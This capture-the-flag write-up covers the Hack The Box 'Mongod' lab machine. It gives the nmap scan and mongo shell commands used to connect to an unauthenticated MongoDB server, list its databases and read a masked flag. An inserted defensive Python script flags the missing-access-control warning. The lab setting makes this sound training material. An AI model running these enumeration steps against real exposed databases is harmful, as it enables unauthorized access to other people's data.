HTB Mongod

This is another of the Very easy HTB Starting Point boxes.

$ nmap -sV -p- 10.129.143.75 --min-rate 5000

Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-08 16:50 CEST
Nmap scan report for 10.129.143.75
Host is up (0.033s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
27017/tcp open  mongodb MongoDB 3.6.8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.69 seconds

As we can see in the Nmap results, we have MongoDB version 3.6.8 listening on port 27017.

MongoDB is a NoSQL database.
You can find more information in their documentation here: https://www.mongodb.com/docs

To be able to interact with the database, we need to install the MongoDB client package on our Kali Linux.

It is included in the Kali repository, so we just need to use apt.

$ sudo apt install mongodb

We try to connect and find that the server accepts unauthenticated connections, so no credentials are needed.

$ mongo mongodb://10.129.143.75:27017

MongoDB shell version v6.0.1
connecting to: mongodb://10.129.143.75:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("d732a698-b4ef-42d3-b3ae-d608e4802c33") }
MongoDB server version: 3.6.8
WARNING: shell and server versions do not match
================
Warning: the "mongo" shell has been superseded by "mongosh",
which delivers improved usability and compatibility.The "mongo" shell has been deprecated and will be removed in
an upcoming release.
For installation instructions, see
https://docs.mongodb.com/mongodb-shell/install/
================
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
	https://docs.mongodb.com/
Questions? Try the MongoDB Developer Community Forums
	https://community.mongodb.com
---
The server generated these startup warnings when booting: 
2022-10-08T14:49:44.575+0000 I STORAGE  [initandlisten] 
2022-10-08T14:49:44.575+0000 I STORAGE  [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2022-10-08T14:49:44.575+0000 I STORAGE  [initandlisten] **          See http://dochub.mongodb.org/core/prodnotes-filesystem
2022-10-08T14:49:48.017+0000 I CONTROL  [initandlisten] 
2022-10-08T14:49:48.017+0000 I CONTROL  [initandlisten] ** WARNING: Access control is not enabled for the database.
2022-10-08T14:49:48.017+0000 I CONTROL  [initandlisten] **          Read and write access to data and configuration is unrestricted.
2022-10-08T14:49:48.017+0000 I CONTROL  [initandlisten] 
---
> 
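The "Access control is not enabled" banner above is exactly the line a defender should be alerting on in mongod's own log. As an added example (not from the original post), this Python script parses mongod 3.6-style log lines, pulls out the startup warnings and maps each to the mongod.conf setting that fixes it; the sample lines are the ones the server printed above, embedded here as a constructed string.

```python
import re

# mongod 3.x log line: <ISO timestamp> <severity> <component> [<context>] <message>
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<sev>[DIWEF])\s+(?P<comp>[A-Z-]+)\s+\[(?P<ctx>[^\]]+)\]\s*(?P<msg>.*)$"
)

# Constructed sample: the startup warnings the box's server printed on connect.
SAMPLE_LOG = """\
2022-10-08T14:49:44.575+0000 I STORAGE  [initandlisten]
2022-10-08T14:49:44.575+0000 I STORAGE  [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2022-10-08T14:49:44.575+0000 I STORAGE  [initandlisten] **          See http://dochub.mongodb.org/core/prodnotes-filesystem
2022-10-08T14:49:48.017+0000 I CONTROL  [initandlisten]
2022-10-08T14:49:48.017+0000 I CONTROL  [initandlisten] ** WARNING: Access control is not enabled for the database.
2022-10-08T14:49:48.017+0000 I CONTROL  [initandlisten] **          Read and write access to data and configuration is unrestricted.
"""

# Warning text fragment -> (finding id, remediation in mongod.conf terms).
# NO_AUTH is the one that matters here: without it anyone who can reach 27017 reads every database.
CHECKS = {
    "Access control is not enabled": ("NO_AUTH", "set security.authorization: enabled and create users with roles; restrict net.bindIp"),
    "Using the XFS filesystem is strongly recommended": ("FS_NOT_XFS", "place the WiredTiger data directory on XFS"),
}


def parse_startup_warnings(text):
    """Return (component, warning text) for every '** WARNING:' line logged by initandlisten."""
    found = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("ctx") != "initandlisten":
            continue
        msg = m.group("msg")
        if msg.startswith("** WARNING:"):
            found.append((m.group("comp"), msg[len("** WARNING:"):].strip()))
    return found


def audit(text):
    """Map the startup warnings in a log excerpt to findings with a fix, in log order."""
    findings = []
    for comp, msg in parse_startup_warnings(text):
        for needle, (fid, fix) in CHECKS.items():
            if needle in msg:
                findings.append({"id": fid, "component": comp, "fix": fix})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_LOG):
        print(f"[{f['id']}] {f['component']}: {f['fix']}")
```

Running it against the sample prints the FS_NOT_XFS and NO_AUTH findings; point it at /var/log/mongodb/mongod.log to check a real instance after restarting it with authorization enabled.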

Now we can list the databases available on the server with the show dbs command.

>show dbs

admin                  0.000GB
config                 0.000GB
local                  0.000GB
sensitive_information  0.000GB
users                  0.000GB

With use <database_name> we can switch to the corresponding database.

>use sensitive_information

switched to db sensitive_information

show collections will print a list of all collections for the current database.

>show collections

flag

db.collection.find().pretty() finds all documents in the collection and returns their content in a format that is easy to read.

>db.flag.find().pretty()

{
	"_id" : ObjectId("630e3dbcb82540ebbd1748c5"),
	"flag" : "1b6eXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
}

Our flag is then: 1b6eXXXXXXXXXXXXXXXXXXXXXXXXXXXX
